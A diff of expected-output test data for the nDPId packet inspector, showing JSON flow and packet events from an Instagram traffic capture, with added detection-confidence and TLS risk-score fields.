 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1436720898499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1436720898499,"pkt":"ABsv8H60QPMIw47hCABFAAA0TytAAEAGEYnAqABnrfxrBNw+AbsehKWjVxTFlYAQAOXaNgAAAQEICgAD6pe8TYT0"}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 01292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1436720898551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"ts_msec":1436720898551,"pkt":"QPMIw47hABsv8H60CABFAAKZ5iRAAFUG\/+kfDV00wKgAZwG7hJCk1JOYiMGTh4AYAE6DfwAAAQEIClpSq5UAA+qLFwMBAmB3TNLiDxMdaG\/77FJR8O6B7ETM5PL1YEwRicjM0iP0UHaAjwUM69tZJRboKPSJSylQ1372woiRMUoGT0dkqivXwS77nykGpDpQxH2zG\/qLmXj10Apbm9mNJzojbuGkVAQeXciVaLovJfxV8pe4ApuOMtqX+wzNa0ZzIxrRfdGy1r+REoc96\/duttzeccU7r8F+0sSj4kAMBptpjPxHIWmQ8bvcQmsOZTBbtWqbInBydwnOzZKHuUG4UpWsNoKQLrxSa1ETAsjugoyEe5PPT8+cb8Irh4mKsNfbStX5KDjpe9Dme8aKUCL1ceYHHjALeMY9l4fx2o0KIF6TukGkzvqR8cZ+qcyDG5U\/HYh5lxYTcHS7lDXS1PzV6XOR41h1cZ9L+KxXE6JczRHCSiNT1VF7boI4Qizj5lEdfdajhSQHOEg16UAhsZHpgK1G5Iki1ek6rdWyUqwchJMZYUThaRdJpKv9RM0OW9cAtKW4cZKenq0TEdOPDEBRCwskRboA6Gi3YnhJ3qdvDGkTLGo9t+FpkGczAZZn4gKC4xoEybQb10OFqFb4BP0BHlc1dmzqbYjWeEKW2wJjaNEaqdUvlusDaKzJPAfd\/FC3qcdqBy6RoP1rw6AWfXgFirXb5SF1IsZGaICO7Vi\/A05NBIj2TN+sAkrMTvlnJxzijI3OS4z\/O7pdS0yJ1AhdM2CbNqiTSP1\/fSWG2i895LYIERx7TAiABxyhh9ufac6WLn1D9wJV86snpuHfJEPWipx7pSJs20IjfVBIUe\/onrcoOjL6GotP95FotxVNOdpbLqczmpv1mQ=="}
-00921{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"ts_msec":1436720900684,"pkt":"ABsv8H60QPMIw47hCABFAAE4wXBAAEAGQn\/AqABnLiFGoJegAFCP9SVkp0jV34AYH+olJAAAAQEICgAD63Ga3vWjR0VUIC9ocGhvdG9zLWFrLXhhcDEvdDUxLjI4ODUtMTUvZTM1LzEwODU5OTk0XzEwMDk0MzM3OTI0MzQ0NDdfMTYyNzY0NjA2Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtaC5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="}
-00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":319,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":319,"pkt_l4_len":285,"ts_msec":1436720900687,"pkt":"ABsv8H60QPMIw47hCABFAAEx0CVAAEAGO5vAqABnUlUaouJQAFA6kgvvKZIczIAYH0cqkQAAAQEICgAD63FWCuc2R0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTE1LzExMzg2NTI0XzExMDI1NzYxOTMxNzQzMF8zNzk1MTM2NTRfbi5qcGcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1nLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="}
-00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"ts_msec":1436720900690,"pkt":"ABsv8H60QPMIw47hCABFAAE3v7dAAEAGS+vAqABnUlUauq1bAFCj1oFKfMvpWoAYDTz8dgAAAQEICgAD63JUYaBjR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExMzc5MTQ4XzE0NDkxMjAyMjg3NDUzMTZfNjA3NDc3OTYyX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1lLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="}
-00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"ts_msec":1436720900692,"pkt":"ABsv8H60QPMIw47hCABFAAE3iBFAAEAGg5LAqABnUlUaueJtAFAE8EMOWjfyZYAYD+bdMQAAAQEICgAD63JZ6ogYR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExNDI0NjIzXzE2MDgxNjMxMDk0NTA0MjFfNjYzMzE1ODgzX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1mLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="}
-00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}}
 02370{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1436720900716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"ts_msec":1436720900716,"pkt":"QPMIw47hABsv8H60CABFAAW+uH1AADkGTewuIUagwKgAZwBQl6CnSNXfj\/UmaIAQAiku5gAAAQEICprfPdsAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjU3OjA4IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTUwMDMxDQpDYWNoZS1Db250cm9sOiBuby10cmFuc2Zvcm0sIG1heC1hZ2U9MTIwOTYwMA0KRXhwaXJlczogU3VuLCAyNiBKdWwgMjAxNSAxNzowODoyMCBHTVQNCkRhdGU6IFN1biwgMTIgSnVsIDIwMTUgMTc6MDg6MjAgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDBjMzQ3MDAwMDEzNjQwMDAwNjM4NDAwMDA4MzJiMDEwMDBiODUwMTAwODdkZjAxMDAwZDRhMDIwMDlkYTIwMjAwNzY3MzAzMDAA\/9sAQwAGBgYGBgYLBgYLEAsLCxAVEBAQEBUbFRUVFRUbIBsbGxsbGyAgICAgICAgJycnJycnLS0tLS0zMzMzMzMzMzMz\/9sAQwEICAgNDA0WDAwWNSQeJDU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1\/8IAEQgEDwQPAwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAUBAgMEBgAHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAANnYrv6OWePnpwvl4Ucr5ZqutmsxzGNFZbBKECWI2oX8gp+rqOdscgJarTJrPTiAtUZEnHz0qOljcEskD1c01Rksi2ko7C10FaSJqLDY0bkkglRK+J01IqIm99eIL6jmheWgjCKVJUTsjcmxJXNVG3K1KNr3irtvMCithKVbraoq9cQKb5mse+vydpRzhEXinDIvFyoIspSDsdW4LfVORbSFGS9z0Q07Vapihe24SRFCV8D5p7U4fInJNSacY9CnDoLekTpOusTppdQVRUWk5Z3S6nSOaiisOZWrWqtSjFjqVjcxzA+ktxbdV5FmYfOO1PR5O6tOVN6dGCvruavqOenPG2AT0hWptvhfNzvglTijkaS2WB9FlYElvdXcE7qNkc6sYnO6nwWWwvB6cwHJ3BI+Pk7LqzU7SQPCRiRBzWw1M8o9Wr7h8yd2Yes0RUdMne6nInZbXUcjq0gpefEOw6FZdhsSpo1\/NNSRGRwz8KussbUKdHc9LXYK7JQkHbZE9CMRrLHVuCy6tIhIp+ajbOxDZOaN8kM6b52TRosiOmpWqktXN4fR9WcyxQQ3Mi1m1NxKzxO57gjldCOau1Guh6KocxG0s90jNuePlRqSaiqL7xrhlZBD1ROCogrq0VC86jwXI66CmfUcy84e5MlIKemSZRcnZWo5lqOCIVpafMuyjnIKtHOmrjanNWmV0at9VUdlavIty0UHfcNVBHhvASbQRlyCBWndG1xZlpvVXVpuTtPpPHelHPmiqjZJuxJVci8tKRVa6m0Lsg1QJNocO+lKMV1BqVN+Km1zbjrI1P1ZzUr6iNEZRL5ZRw56q6yDgmfWQLsg16ZNg3hkHi+ETQdInbdS4duCJorHU42r7hqMKoMQCnCeAuojkF0F8BRBzhkEpcFpK6im5sQ5GRJU57qi78tptbhTpBzLHQKE7qrwsdX4LS1+Ts9Uc1YWugWOruCfoFCwtRydla3CsLCo7DIlTl6FQm6BQnWuoT9DwSpCoS9DwTdA4JVrqE\/QKOx0ChM6u5EjoeCVY+ZIiIA="}
